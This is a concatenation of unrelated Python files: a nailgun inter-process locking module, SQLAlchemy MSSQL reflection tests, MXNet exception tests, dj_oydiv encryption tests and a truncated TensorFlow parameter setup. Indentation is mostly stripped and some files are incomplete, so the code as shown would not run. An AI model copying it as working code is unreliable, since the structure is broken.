from nailgun.openstack.common import fileutils
from nailgun.openstack.common.gettextutils import _ # noqa
from nailgun.openstack.common import local
from nailgun.openstack.common import log as logging
LOG = logging.getLogger(__name__)
util_opts = [
cfg.BoolOpt('disable_process_locking', default=False,
help='Whether to disable inter-process locks'),
cfg.StrOpt('lock_path',
default=os.environ.get("NAILGUN_LOCK_PATH"),
help=('Directory to use for lock files.'))
]
CONF = cfg.CONF
CONF.register_opts(util_opts)
def set_defaults(lock_path):
cfg.set_defaults(util_opts, lock_path=lock_path)
class _InterProcessLock(object):
"""Lock implementation which allows multiple locks, working around
issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
not require any cleanup. Since the lock is always held on a file
descriptor rather than outside of the process, the lock gets dropped
automatically if the process crashes, even if __exit__ is not executed.
There are no guarantees regarding usage by multiple green threads in a
single process here. This lock works only between processes. Exclusive
access between local threads should be achieved using the semaphores
in the @synchronized decorator.
Note these locks are released when the descriptor is closed, so it's not
safe to close the file descriptor while another green thread holds the
lock. Just opening and closing the lock file can break synchronisation,
so lock files must be accessed only using this abstraction.
"""
def __init__(self, name):
self.lockfile = None
self.fname = name
def __enter__(self):
self.lockfile = open(self.fname, 'w')
while True:
try:
# Using non-blocking locks since green threads are not
# patched to deal with blocking locking calls.
# Also upon reading the MSDN docs for locking(), it seems
# to have a laughable 10 attempts "blocking" mechanism.
self.trylock()
return self
except IOError as e:
if e.errno in (errno.EACCES, errno.EAGAIN):
# external locks synchronise things like iptables
# updates - give it some time to prevent busy spinning
time.sleep(0.01)
else:
raise
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.unlock()
self.lockfile.close()
except IOError:
LOG.exception(_("Could not release the acquired lock `%s`"),
self.fname)
def trylock(self):
raise NotImplementedError()
def unlock(self):
raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
def trylock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_NBLCK, 1)
def unlock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
def trylock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
if os.name == 'nt':
import msvcrt
InterProcessLock = _WindowsLock
else:
import fcntl
InterProcessLock = _PosixLock
_semaphores = weakref.WeakValueDictionary()
_semaphores_lock = threading.Lock()
@contextlib.contextmanager
def lock(name, lock_file_prefix=None, external=False, lock_path=None):
"""Context based lock
This function yields a `threading.Semaphore` instance (if we don't use
eventlet.monkey_patch(), else `semaphore.Semaphore`) unless external is
True, in which case, it'll yield an InterProcessLock instance.
:param lock_file_prefix: The lock_file_prefix argument is used to provide
lock files on disk with a meaningful prefix.
:param external: The external keyword argument denotes whether this lock
should work across multiple processes. This means that if two different
    workers both run a method decorated with @synchronized('mylock',
external=True), only one of them will execute at a time.
:param lock_path: The lock_path keyword argument is used to specify a
special location for external lock files to live. If nothing is set, then
CONF.lock_path is used as a default.
"""
with _semaphores_lock:
try:
sem = _semaphores[name]
except KeyError:
sem = threading.Semaphore()
_semaphores[name] = sem
with sem:
LOG.debug(_('Got semaphore "%(lock)s"'), {'lock': name})
# NOTE(mikal): I know this looks odd
if not hasattr(local.strong_store, 'locks_held'):
local.strong_store.locks_held = []
local.strong_store.locks_held.append(name)
try:
if external and not CONF.disable_process_locking:
LOG.debug(_('Attempting to grab file lock "%(lock)s"'),
{'lock': name})
# We need a copy of lock_path because it is non-local
local_lock_path = lock_path or CONF.lock_path
if not local_lock_path:
raise cfg.RequiredOptError('lock_path')
if not os.path.exists(local_lock_path):
fileutils.ensure_tree(local_lock_path)
LOG.info(_('Created lock path: %s'), local_lock_path)
def add_prefix(name, prefix):
if not prefix:
return name
sep = '' if prefix.endswith('-') else '-'
return '%s%s%s' % (prefix, sep, name)
# NOTE(mikal): the lock name cannot contain directory
# separators
lock_file_name = add_prefix(name.replace(os.sep, '_'),
lock_file_prefix)
lock_file_path = os.path.join(local_lock_path, lock_file_name)
try:
lock = InterProcessLock(lock_file_path)
with lock as lock:
LOG.debug(_('Got file lock "%(lock)s" at %(path)s'),
{'lock': name, 'path': lock_file_path})
yield lock
finally:
LOG.debug(_('Released file lock "%(lock)s" at %(path)s'),
{'lock': name, 'path': lock_file_path})
else:
yield sem
finally:
local.strong_store.locks_held.remove(name)
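# Illustrative usage (not from the original module): ``lock`` as a context
# manager for cross-process mutual exclusion. Assumes CONF.lock_path is
# configured, e.g. via set_defaults('/var/lock/nailgun'); the lock name and
# function below are hypothetical.
def _example_critical_section():
    with lock('state-update', lock_file_prefix='nailgun-', external=True):
        # Only one process at a time runs this block; with external=False
        # (the default) only one thread within this process does.
        pass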
def synchronized(name, lock_file_prefix=None, external=False, lock_path=None):
"""Synchronization decorator.
Decorating a method like so::
@synchronized('mylock')
def foo(self, *args):
...
ensures that only one thread will execute the foo method at a time.
Different methods can share the same lock::
@synchronized('mylock')
def foo(self, *args):
...
@synchronized('mylock')
def bar(self, *args):
...
This way only one of either foo or bar can be executing at a time.
"""
def wrap(f):
@functools.wraps(f)
def inner(*args, **kwargs):
try:
with lock(name, lock_file_prefix, external, lock_path):
LOG.debug(_('Got semaphore / lock "%(function)s"'),
{'function': f.__name__})
return f(*args, **kwargs)
finally:
LOG.debug(_('Semaphore / lock released "%(function)s"'),
{'function': f.__name__})
return inner
return wrap
def synchronized_with_prefix(lock_file_prefix):
"""Partial object generator for the synchronization decorator.
Redefine @synchronized in each project like so::
(in nova/utils.py)
from nova.openstack.common import lockutils
synchronized = lockutils.synchronized_with_prefix('nova-')
(in nova/foo.py)
from nova import utils
@utils.synchronized('mylock')
def bar(self, *args):
...
The lock_file_prefix argument is used to provide lock files on disk with a
meaningful prefix.
"""
return functools.partial(synchronized, lock_file_prefix=lock_file_prefix)
def main(argv):
"""Create a dir for locks and pass it to command from arguments
If you run this:
python -m openstack.common.lockutils python setup.py testr <etc>
a temporary directory will be created for all your locks and passed to all
your tests in an environment variable. The temporary dir will be deleted
afterwards and the return value will be preserved.
"""
lock_dir = tempfile.mkdtemp()
os.environ["NAILGUN_LOCK_PATH"] = lock_dir
try:
ret_val = subprocess.call(argv[1:])
finally:
shutil.rmtree(lock_dir, ignore_errors=True)
return ret_val
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
|
# -*- encoding: utf-8
from sqlalchemy import Column
from sqlalchemy import DDL
from sqlalchemy import event
from sqlalchemy import ForeignKey
from sqlalchemy import Index
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import schema
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import types
from sqlalchemy import util
from sqlalchemy.databases import mssql
from sqlalchemy.dialects.mssql import base
from sqlalchemy.dialects.mssql.information_schema import CoerceUnicode
from sqlalchemy.dialects.mssql.information_schema import tables
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import ComparesTables
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import in_
from sqlalchemy.testing import is_
from sqlalchemy.testing import mock
class ReflectionTest(fixtures.TestBase, ComparesTables, AssertsCompiledSQL):
__only_on__ = "mssql"
__backend__ = True
@testing.provide_metadata
def test_basic_reflection(self):
meta = self.metadata
users = Table(
"engine_users",
meta,
Column("user_id", types.INT, primary_key=True),
Column("user_name", types.VARCHAR(20), nullable=False),
Column("test1", types.CHAR(5), nullable=False),
Column("test2", types.Float(5), nullable=False),
Column("test2.5", types.Float(), nullable=False),
Column("test3", types.Text()),
Column("test4", types.Numeric, nullable=False),
Column("test4.5", types.Numeric(10, 2), nullable=False),
Column("test5", types.DateTime),
Column(
"parent_user_id",
types.Integer,
ForeignKey("engine_users.user_id"),
),
Column("test6", types.DateTime, nullable=False),
Column("test7", types.Text()),
Column("test8", types.LargeBinary()),
Column("test_passivedefault2", types.Integer, server_default="5"),
Column("test9", types.BINARY(100)),
Column("test_numeric", types.Numeric()),
)
addresses = Table(
"engine_email_addresses",
meta,
Column("address_id", types.Integer, primary_key=True),
Column(
"remote_user_id", types.Integer, ForeignKey(users.c.user_id)
),
Column("email_address", types.String(20)),
)
meta.create_all()
meta2 = MetaData()
reflected_users = Table(
"engine_users", meta2, autoload=True, autoload_with=testing.db
)
reflected_addresses = Table(
"engine_email_addresses",
meta2,
autoload=True,
autoload_with=testing.db,
)
self.assert_tables_equal(users, reflected_users)
self.assert_tables_equal(addresses, reflected_addresses)
@testing.provide_metadata
def _test_specific_type(self, type_obj, ddl):
metadata = self.metadata
table = Table("type_test", metadata, Column("col1", type_obj))
table.create()
m2 = MetaData()
table2 = Table("type_test", m2, autoload_with=testing.db)
self.assert_compile(
schema.CreateTable(table2),
"CREATE TABLE type_test (col1 %s NULL)" % ddl,
)
def test_xml_type(self):
self._test_specific_type(mssql.XML, "XML")
def test_image_type(self):
self._test_specific_type(mssql.IMAGE, "IMAGE")
def test_money_type(self):
self._test_specific_type(mssql.MONEY, "MONEY")
def test_numeric_prec_scale(self):
self._test_specific_type(mssql.NUMERIC(10, 2), "NUMERIC(10, 2)")
def test_float(self):
self._test_specific_type(mssql.FLOAT, "FLOAT(53)")
def test_real(self):
self._test_specific_type(mssql.REAL, "REAL")
def test_float_as_real(self):
# FLOAT(5) comes back as REAL
self._test_specific_type(mssql.FLOAT(5), "REAL")
@testing.provide_metadata
def test_identity(self):
metadata = self.metadata
table = Table(
"identity_test",
metadata,
Column(
"col1",
Integer,
mssql_identity_start=2,
mssql_identity_increment=3,
primary_key=True,
),
)
table.create()
meta2 = MetaData(testing.db)
table2 = Table("identity_test", meta2, autoload=True)
eq_(table2.c["col1"].dialect_options["mssql"]["identity_start"], 2)
eq_(table2.c["col1"].dialect_options["mssql"]["identity_increment"], 3)
@testing.emits_warning("Did not recognize")
@testing.provide_metadata
def test_skip_types(self):
metadata = self.metadata
testing.db.execute(
"""
create table foo (id integer primary key, data xml)
"""
)
with mock.patch.object(
testing.db.dialect, "ischema_names", {"int": mssql.INTEGER}
):
t1 = Table("foo", metadata, autoload=True)
assert isinstance(t1.c.id.type, Integer)
assert isinstance(t1.c.data.type, types.NullType)
@testing.provide_metadata
def test_cross_schema_fk_pk_name_overlaps(self):
# test for issue #4228
metadata = self.metadata
Table(
"subject",
metadata,
Column("id", Integer),
PrimaryKeyConstraint("id", name="subj_pk"),
schema=testing.config.test_schema,
)
Table(
"referrer",
metadata,
Column("id", Integer, primary_key=True),
Column(
"sid",
ForeignKey(
"%s.subject.id" % testing.config.test_schema,
name="fk_subject",
),
),
schema=testing.config.test_schema,
)
Table(
"subject",
metadata,
Column("id", Integer),
PrimaryKeyConstraint("id", name="subj_pk"),
schema=testing.config.test_schema_2,
)
metadata.create_all()
insp = inspect(testing.db)
eq_(
insp.get_foreign_keys("referrer", testing.config.test_schema),
[
{
"name": "fk_subject",
"constrained_columns": ["sid"],
"referred_schema": "test_schema",
"referred_table": "subject",
"referred_columns": ["id"],
}
],
)
@testing.provide_metadata
def test_table_name_that_is_greater_than_16_chars(self):
metadata = self.metadata
Table(
"ABCDEFGHIJKLMNOPQRSTUVWXYZ",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Index("foo_idx", "foo"),
)
metadata.create_all()
t = Table(
"ABCDEFGHIJKLMNOPQRSTUVWXYZ", MetaData(), autoload_with=testing.db
)
eq_(t.name, "ABCDEFGHIJKLMNOPQRSTUVWXYZ")
@testing.provide_metadata
def test_db_qualified_items(self):
metadata = self.metadata
Table("foo", metadata, Column("id", Integer, primary_key=True))
Table(
"bar",
metadata,
Column("id", Integer, primary_key=True),
Column("foo_id", Integer, ForeignKey("foo.id", name="fkfoo")),
)
metadata.create_all()
dbname = testing.db.scalar("select db_name()")
owner = testing.db.scalar("SELECT user_name()")
referred_schema = "%(dbname)s.%(owner)s" % {
"dbname": dbname,
"owner": owner,
}
inspector = inspect(testing.db)
bar_via_db = inspector.get_foreign_keys("bar", schema=referred_schema)
eq_(
bar_via_db,
[
{
"referred_table": "foo",
"referred_columns": ["id"],
"referred_schema": referred_schema,
"name": "fkfoo",
"constrained_columns": ["foo_id"],
}
],
)
assert inspect(testing.db).has_table("bar", schema=referred_schema)
m2 = MetaData()
Table(
"bar",
m2,
schema=referred_schema,
autoload=True,
autoload_with=testing.db,
)
eq_(m2.tables["%s.foo" % referred_schema].schema, referred_schema)
@testing.provide_metadata
def test_indexes_cols(self):
metadata = self.metadata
t1 = Table("t", metadata, Column("x", Integer), Column("y", Integer))
Index("foo", t1.c.x, t1.c.y)
metadata.create_all()
m2 = MetaData()
t2 = Table("t", m2, autoload=True, autoload_with=testing.db)
eq_(set(list(t2.indexes)[0].columns), set([t2.c["x"], t2.c.y]))
@testing.provide_metadata
def test_indexes_cols_with_commas(self):
metadata = self.metadata
t1 = Table(
"t",
metadata,
Column("x, col", Integer, key="x"),
Column("y", Integer),
)
Index("foo", t1.c.x, t1.c.y)
metadata.create_all()
m2 = MetaData()
t2 = Table("t", m2, autoload=True, autoload_with=testing.db)
eq_(set(list(t2.indexes)[0].columns), set([t2.c["x, col"], t2.c.y]))
@testing.provide_metadata
def test_indexes_cols_with_spaces(self):
metadata = self.metadata
t1 = Table(
"t",
metadata,
Column("x col", Integer, key="x"),
Column("y", Integer),
)
Index("foo", t1.c.x, t1.c.y)
metadata.create_all()
m2 = MetaData()
t2 = Table("t", m2, autoload=True, autoload_with=testing.db)
eq_(set(list(t2.indexes)[0].columns), set([t2.c["x col"], t2.c.y]))
@testing.provide_metadata
def test_max_ident_in_varchar_not_present(self):
"""test [ticket:3504].
Here we are testing not just that the "max" token comes back
as None, but also that these types accept "max" as the value
of "length" on construction, which isn't a directly documented
    pattern but is likely in common use.
"""
metadata = self.metadata
Table(
"t",
metadata,
Column("t1", types.String),
Column("t2", types.Text("max")),
Column("t3", types.Text("max")),
Column("t4", types.LargeBinary("max")),
Column("t5", types.VARBINARY("max")),
)
metadata.create_all()
for col in inspect(testing.db).get_columns("t"):
is_(col["type"].length, None)
in_("max", str(col["type"].compile(dialect=testing.db.dialect)))
class InfoCoerceUnicodeTest(fixtures.TestBase, AssertsCompiledSQL):
def test_info_unicode_coercion(self):
dialect = mssql.dialect()
value = CoerceUnicode().bind_processor(dialect)("a string")
assert isinstance(value, util.text_type)
def test_info_unicode_cast_no_2000(self):
dialect = mssql.dialect()
dialect.server_version_info = base.MS_2000_VERSION
stmt = tables.c.table_name == "somename"
self.assert_compile(
stmt,
"[INFORMATION_SCHEMA].[TABLES].[TABLE_NAME] = :table_name_1",
dialect=dialect,
)
def test_info_unicode_cast(self):
dialect = mssql.dialect()
dialect.server_version_info = base.MS_2005_VERSION
stmt = tables.c.table_name == "somename"
self.assert_compile(
stmt,
"[INFORMATION_SCHEMA].[TABLES].[TABLE_NAME] = "
"CAST(:table_name_1 AS NVARCHAR(max))",
dialect=dialect,
)
class ReflectHugeViewTest(fixtures.TestBase):
__only_on__ = "mssql"
__backend__ = True
# crashes on freetds 0.91, not worth it
__skip_if__ = (lambda: testing.requires.mssql_freetds.enabled,)
def setup(self):
self.col_num = 150
self.metadata = MetaData(testing.db)
t = Table(
"base_table",
self.metadata,
*[
Column("long_named_column_number_%d" % i, Integer)
for i in range(self.col_num)
]
)
self.view_str = view_str = (
"CREATE VIEW huge_named_view AS SELECT %s FROM base_table"
% (
",".join(
"long_named_column_number_%d" % i
for i in range(self.col_num)
)
)
)
assert len(view_str) > 4000
event.listen(t, "after_create", DDL(view_str))
event.listen(t, "before_drop", DDL("DROP VIEW huge_named_view"))
self.metadata.create_all()
def teardown(self):
self.metadata.drop_all()
def test_inspect_view_definition(self):
inspector = Inspector.from_engine(testing.db)
view_def = inspector.get_view_definition("huge_named_view")
eq_(view_def, self.view_str)
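# Minimal reflection sketch (illustration, not part of the test suite): the
# pattern the tests above repeat is to create tables, then reflect them into
# a fresh MetaData with autoload_with so the reflected and declared forms
# can be compared. The function name is hypothetical.
def _reflect_columns(engine, table_name):
    m = MetaData()
    t = Table(table_name, m, autoload_with=engine)
    return [c.name for c in t.columns]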
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import mxnet as mx
import numpy as np
from mxnet import gluon
from mxnet.gluon import nn
from mxnet.base import MXNetError
from mxnet.test_utils import assert_exception, default_context, set_default_context, use_np
import pytest
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="This test assumes asynchronous execution.")
def test_exc_imperative():
def imperative(exec_numpy=True):
a = mx.nd.random.normal(0, 1, (2, 2))
b = mx.nd.random.normal(0, -1, (2, 2))
c = mx.nd.dot(a, b)
if exec_numpy:
c.asnumpy()
imperative(exec_numpy=False)
pytest.raises(MXNetError, imperative, exec_numpy=True)
def test_exc_symbolic():
def symbolic(exec_backward=True, waitall=True):
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
z = mx.sym.Variable('z')
x_shape = (2, 2)
z_shape = (3, 2)
inputs = [x, y]
out = mx.symbol.ElementWiseSum(*inputs, name="esum")
out = mx.sym.dot(z, out)
out2 = mx.sym.random.normal(0, -1, x_shape, ctx=default_context())
out = mx.sym.dot(out, out2)
out = mx.sym.make_loss(out)
arr = {'x': mx.nd.random.normal(0, 1, x_shape, ctx=default_context()),
'y': mx.nd.random.normal(0, 1, x_shape, ctx=default_context()),
'z': mx.nd.random.normal(0, 1, z_shape, ctx=default_context())}
arr_grad = {'x': mx.nd.empty(x_shape), 'y': mx.nd.empty(x_shape), 'z': mx.nd.empty(z_shape)}
exec1 = out._bind(ctx=default_context(), args=arr, args_grad=arr_grad)
outputs = exec1.forward()
if exec_backward:
exec1.backward()
if waitall:
mx.nd.waitall()
else:
exec1.grad_arrays[0].asnumpy()
else:
if waitall:
mx.nd.waitall()
else:
outputs[0].asnumpy()
pytest.raises(MXNetError, symbolic, exec_backward=False)
pytest.raises(MXNetError, symbolic, exec_backward=True)
pytest.raises(MXNetError, symbolic, exec_backward=False, waitall=True)
pytest.raises(MXNetError, symbolic, exec_backward=True, waitall=True)
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="This test assumes asynchronous execution.")
def test_exc_gluon():
def gluon(exec_wait=True, waitall=False):
model = nn.Sequential()
model.add(nn.Dense(128, activation='tanh', in_units=10, flatten=False))
model.add(nn.Dropout(1))
model.add(nn.Dense(64, activation='tanh', in_units=256),
nn.Dense(32, in_units=64))
model.initialize(ctx=[default_context()])
x = mx.sym.var('data')
y = model(x)
z = model(mx.nd.random.normal(10, -10, (32, 2, 10), ctx=default_context()))
if waitall:
mx.nd.waitall()
elif exec_wait:
z.wait_to_read()
gluon(exec_wait=False)
pytest.raises(MXNetError, gluon, exec_wait=True)
pytest.raises(MXNetError, gluon, waitall=True)
def test_exc_multiple_waits():
def multiple_waits(waitall=False):
# Test calling failed op followed by wait_to_read or waitall twice
# Intention is to test rethrow for multiple wait_to_reads and waitalls
# for vars with exceptions in same scope
caught = False
try:
a = mx.nd.random.normal(0, -1, (2, 2)).copyto(default_context())
if waitall:
mx.nd.waitall()
else:
a.wait_to_read()
except MXNetError:
caught = True
assert caught, "No exception thrown, exception should be rethrown with wait_to_read/waitall"
try:
b = mx.nd.random.normal(0, -1, (2, 2)).copyto(default_context())
if waitall:
mx.nd.waitall()
else:
b.wait_to_read()
except MXNetError:
caught = True
assert caught, "No exception thrown, exception should be rethrown with wait_to_read/waitall"
multiple_waits(waitall=False)
multiple_waits(waitall=True)
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="This test assumes asynchronous execution.")
def test_exc_post_fail():
def post_fail(waitall=False):
caught = False
try:
a, b = mx.nd.random_normal(0, -1, (2, 2)).copyto(default_context())
if waitall:
mx.nd.waitall()
else:
a.asnumpy()
except MXNetError:
caught = True
assert caught, "No exception thrown"
b.asnumpy()
post_fail(waitall=False)
post_fail(waitall=True)
def test_exc_mutable_var_fail():
def mutable_var_check(waitall=False):
a, b = mx.nd.random_normal(0, -1, (2, 2)).copyto(default_context())
a = mx.nd.dot(a, a)
if waitall:
mx.nd.waitall()
else:
a.asnumpy()
pytest.raises(MXNetError, mutable_var_check, waitall=False)
pytest.raises(MXNetError, mutable_var_check, waitall=True)
def test_multiple_waitalls():
caught = False
try:
a = mx.nd.random.normal(0, -1, (2, 2)).copyto(default_context())
mx.nd.waitall()
except MXNetError:
caught = True
assert caught, "No exception thrown"
mx.nd.waitall()
def test_exc_profiler():
    def run_training_iteration(data):
        output = net(data)
    net = gluon.nn.HybridSequential()
    net.add(gluon.nn.Dense(10))
    ctx = default_context()
    net.initialize(mx.init.Xavier(), ctx=ctx)
    data = mx.nd.ones((3, 4))
    mx.profiler.set_state("run")
    run_training_iteration(data)
    mx.nd.waitall()
    mx.profiler.set_state("stop")
def test_opencv_exception():
def check_resize():
img = mx.nd.ones((1200, 1600, 3))
img = mx.image.imresize(img, 320, 320, interp=-1)
img.asnumpy()
pytest.raises(MXNetError, check_resize)
def test_np_reshape_exception():
a = mx.np.ones((10, 10))
a.reshape((-1,)).asnumpy() # Check no-raise
pytest.raises(MXNetError, lambda: a.reshape((1,)))
pytest.raises(MXNetError, lambda: mx.np.reshape(a, (1,)))
pytest.raises(MXNetError, lambda: mx.np.reshape(a, (-1, 3)))
@use_np
def test_np_random_incorrect_named_arguments():
random_ops = ['uniform', 'normal', 'randint', 'choice']
for op_name in random_ops:
op = getattr(mx.np.random, op_name, None)
assert op is not None
pytest.raises(TypeError, op, shape=())
pytest.raises(TypeError, op, shape=None)
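# Hedged illustration (not one of the original tests): MXNet queues
# imperative ops asynchronously, so an invalid op raises only at a
# synchronization point (asnumpy/wait_to_read/waitall), which is the
# behaviour the tests above exercise.
def _example_deferred_error():
    bad = mx.nd.random.normal(0, -1, (2, 2))  # enqueued; no error yet
    try:
        bad.asnumpy()  # blocking call: the MXNetError surfaces here
    except MXNetError:
        pass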
|
|
from __future__ import absolute_import, unicode_literals
import os
import mock
from django.test import TestCase
from django.utils.encoding import force_text
from dj_oydiv.utils.random import random_ascii_letters
from dj_oydiv.models import VidyoAdmin
from dj_oydiv.utils.crypto import (
sym_encrypt_cfb_128,
sym_decrypt_cfb_dict
)
from . import PACKAGE_BASE
from .models import (
CryptoTextTest,
save_then_retrieve,
)
class TestCryptoTextTests(TestCase):
"""
    The tests in this class validate basic sanity of the crypto object.
    They include sanity checks/data verification that the stored data
    looks *somewhat* encrypted. They're mostly just functionality tests, plus
    assertions that bad input results in errors, as we're relying on the
    sanity of pyCrypto.
"""
cleartext = 'aaaaaaaaaaaaaaaaaa'
key = 'password'
badkey = 'wrong!'
newkey = 'anothertotallysecretpassword'
def test_no_cleartext_saved(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t.save()
pk = t.pk
t = CryptoTextTest.objects.get(pk=pk)
t.key = self.key
self.assertNotEqual(t.ciphertext, self.cleartext)
self.assertNotIn(self.cleartext, t.ciphertext)
def test_change_key(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
t.change_key(self.newkey)
t = save_then_retrieve(t, key=self.newkey)
self.assertEqual(self.cleartext, t.data)
def test_data_property(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
self.assertNotEqual(t.data, t.ciphertext)
old_ciphertext = t.ciphertext
t.data = self.cleartext + self.cleartext
self.assertNotEqual(old_ciphertext, t.ciphertext)
def test_empty_key_fails(self):
with self.assertRaises(ValueError):
CryptoTextTest(data=self.cleartext, key='')
def test_db_manager_search_with_kwargs_key(self):
pass
def test_verify_returned_data_equal(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
self.assertEqual(self.cleartext, t.data)
    def test_bad_password_fails(self):
        t = CryptoTextTest()
        t.key = self.key
        t.data = self.cleartext
        with self.assertRaises(ValueError):
            save_then_retrieve(t, key=self.badkey).data
def test_tamper_evident(self):
"""change a digit of the hmac_digest, and assert that decryption fails with ValueError"""
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
scheme, iv, kdf_iter, kdf_salt, hmac_algo, hmac_hex, \
ciphertext = t.ciphertext.split("$")
l = int(hmac_hex, base=16)
        # convert the hmac to int, add 1, and convert back to hex
hmac_hex = hex(l + 1)[2:-1]
t.ciphertext = '$'.join((
scheme, iv, kdf_iter, kdf_salt,
hmac_algo, hmac_hex, ciphertext)
)
with self.assertRaises(ValueError):
t.data
def test_large_binary_data(self):
"""
        We're using a text field and require the ability to store large amounts of binary data.
"""
data = os.urandom(2 ** 20)
t = CryptoTextTest(data=data, key=self.key)
t = save_then_retrieve(t, key=self.key)
self.assertEqual(t._decrypt(self.key), data)
def test_same_params_different_outputs(self):
"""Verify we're using unique values for salt"""
t1 = CryptoTextTest(data=self.cleartext, key=self.key)
t2 = CryptoTextTest(data=self.cleartext, key=self.key)
t1 = save_then_retrieve(t1, key=self.key)
t2 = save_then_retrieve(t2, key=self.key)
self.assertNotEqual(t1.ciphertext, t2.ciphertext)
def test_crypto_roundtrip(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
self.assertEqual(self.cleartext, t.data)
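# Hedged sketch (inferred from test_tamper_evident above, not from the
# library's own documentation): the stored ciphertext appears to be seven
# '$'-separated fields. A parser under that assumption:
def _split_ciphertext(blob):
    scheme, iv, kdf_iter, kdf_salt, hmac_algo, hmac_hex, ciphertext = \
        blob.split('$')
    return {'scheme': scheme, 'iv': iv, 'kdf_iter': kdf_iter,
            'kdf_salt': kdf_salt, 'hmac_algo': hmac_algo,
            'hmac_hex': hmac_hex, 'ciphertext': ciphertext}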
class TestMultipleCrypto(TestCase):
"""
    User objects delegate the responsibility for handling re-keying to the assigned admin
objects.
Tests here check that Admin key-rotation works
"""
def test_it_please(self):
# XXX Refactor this into an actual test.
for admin in [VidyoAdmin(portal_user=str(1 + x)) for x in range(1)]:
admin.set_password('mypassword', 'mysecretdata')
admin.save()
class TestRandomAsciiLetters(TestCase):
ascii_printable = ''.join(chr(x) for x in range(0x20, 0x7f, 1))
def test_issue81_regression(self):
"""We switched to django.utils.crypto.get_random_string() because we were
generating passwords with the builtin mersenne twister, seeded manually
from '/dev/urandom'.
This had already been 'fixed' once due to missing parens in a seed() call.
This regression test ensures that we're using django's sane, portable
crypto-quality generator, instead of some unvetted pile.
"""
with mock.patch(
PACKAGE_BASE + '.utils.random.get_random_string',
mock.MagicMock(return_value='thisisrandom')
) as patched:
string = random_ascii_letters()
self.assertEqual(string, 'thisisrandom')
self.assertTrue(patched.called)
def test_ascii_only(self):
for x in range(1000):
s = random_ascii_letters()
for c in s:
self.assertIn(c, self.ascii_printable)
def test_multiple_iterations_nequal(self):
"""Totally naive basic randomness check.
(the implementation uses django.utils.crypto.get_random_string()
under the hood so this should suffice)
"""
s1 = random_ascii_letters()
s2 = random_ascii_letters()
self.assertNotEqual(s1, s2)
def test_crypto_dict_roundtrip(self):
crypt = sym_encrypt_cfb_128('secret', 'sauce')
self.assertEqual(force_text(sym_decrypt_cfb_dict('secret', crypt)), 'sauce')
class CryptoBackwardCompatibilityTests(TestCase):
"""
    We want the ability to add/remove dependencies as needed for speed,
    platform availability, or similar.
    However, data in production databases should still be valid.
    Test that these fixtures decrypt to the expected values.
    A new feature, primitive, or significant change should add a
    backwards-compatibility test here.
"""
def test_backward_compatibility_sym_decrypt_cfb_128(self):
# sym_encrypt_cfb_128('secret', 'something nobody knows') git@f6688dde6
crypt = {
'aes_iv_64': b'azm8m1zKYDQ/uuCGzqxMGA==',
'ciphertext_64': b'1n3rGiH4AXBQyz4EGT6+0ruhf3ev9A==',
'hmac_algo': 'sha256',
'hmac_hex': 'ef849dedefc26b45c1d13cd50de5487159f9af9fccf987318217491f47287588',
'kdf_algo': 'PBKDF2',
'kdf_iter': 1,
'kdf_salt_64': b'J0E0RKe0r+w='
}
self.assertEqual(
force_text(sym_decrypt_cfb_dict('secret', crypt)),
'something nobody knows'
)
|
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import tensorflow as tf
def init_param(number_classes=1000):
model_param = {
'conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[7, 7, 3, 64], stddev=1e-4, dtype=tf.float32)),
'conv1_strides': 2, 'conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'conv1_name': 'conv1', 'conv1_padding': 'SAME',
'max1_ksize': 3,
'max1_strides': 2, 'max1_name': 'max1', 'max1_padding': 'SAME',
'norm1_depth_radius': 2.5,
'norm1_bias': 2.0, 'norm1_alpha': 1e-4, 'norm1_beta': 0.75, 'norm1_name': 'local_resp_norm1',
'conv2_kernel': tf.Variable(tf.truncated_normal(shape=[1, 1, 64, 192], stddev=1e-4, dtype=tf.float32)),
'conv2_strides': 1, 'conv2_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'conv2_name': 'conv2', 'conv2_padding': 'VALID',
